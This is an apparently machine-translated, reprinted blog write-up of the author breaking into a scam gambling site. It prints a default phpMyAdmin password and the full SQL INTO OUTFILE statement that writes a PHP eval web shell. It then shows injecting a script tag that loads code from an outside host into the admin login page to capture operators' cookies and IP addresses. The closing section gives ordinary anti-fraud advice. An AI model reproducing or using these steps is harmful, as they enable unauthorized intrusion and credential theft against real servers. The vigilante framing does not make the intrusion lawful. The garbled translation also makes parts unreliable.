Title: Remember the actual battle to help fans penetrate a certain game of anti-fraud

0X00    The origin of the matter

After understanding the story, after my experience, this should be a pig killing case

Scammers use some means to convince victims that they can make money and induce recharges and kill pigs to gambling

0X01     Penosis process-It was taken down in about twenty minutes

The penetration process is simple and boring:

After taking a look at the IP and port, I judged that there should be no cloud waf, so I started scanning the directory directly

After a few minutes, I scanned a http://xxxx.com.cn/u.php. It turned out to be the integrated environment of upupw, as shown in the figure below

Idea, blast phpmyadmin, or find the default database password of upupw, try it first

Successfully logged in with the password provided by the system, the default is: DRsXT5ZJ6Oi55LPQ successfully logged in phpmyadmin

Then try getshell. Since there is an upupw probe, I directly viewed phpinfo, and the absolute path to the website. I directly tried to write shells in regular terms because of the upupw probe.

You need to know the absolute path, database root permissions, and database write permissions. Specific statements: SELECT '?php eval(@$_POST['xx']);' INTO OUTFILE 'D:\\wap\\member_bak.php' Note: Under Windows, double backslashes are required, otherwise they will be escaped and then use kitchen knife/ant sword and other links. Since there was no screenshot at the time, the website is now unable to be opened, so the following will directly release the status after getting the shell.

The penetration ended. I looked at the permissions. It was the system permissions. However, our goal was to locate the IP information and location information of the fraudsters, and then the next step is

0X02    The IP and ports of positioning fraudsters

It is much easier to get the shell. Just find the php file logged in to the background and insert the xss code.

After searching for a while, I found that the background login is under another website directory, edited admin778899.php

echo'sCRiPtsRC=https://xx.xx/XFXX/sCrIpT'; Waiting for fraudsters to log in

I'm actually logged in with my mobile phone, 666

Replace cookies to log in to the background, but found that it was useless, it was just some numbers.

Go to ipip.net to check the IP address information. No accident, I was indeed abroad again. Alas.

0X03    Inform fans to the results

During the process, I directly posted the WeChat chat record with the victim.

0X04    How to prevent such fraud

1. When making friends online, you should improve your awareness of fraud prevention, maintain a good social mentality, and pay attention to the protection of personal privacy information, especially when it comes to financial transactions. Be sure to verify the other party’s true identity through multiple channels;

2. Anyone who involves taking you to invest and manage your finances on the Internet and has high returns is considered a fraud;

3. Scammers constantly share information about investment profitability in their circle of friends to attract victims to take the initiative to consult;

4. Induce victims to register the platform and invest funds. When the victim saw the profit and wanted to withdraw cash, the platform continued to lure money and commit fraud on the grounds of the victim's bank card number, such as incorrectly requesting deposits, failure to notify as required, account freeze, taxes, etc.

5. Maintain a correct view of investment and financial management, and do not blindly believe in risk-free but high-return investment methods, so there will be no pie falling from the sky.

Reprinted from the original link: https://mp.weixin.qq.com/s/7o4XV8MKbX3wCT3ZxbCMng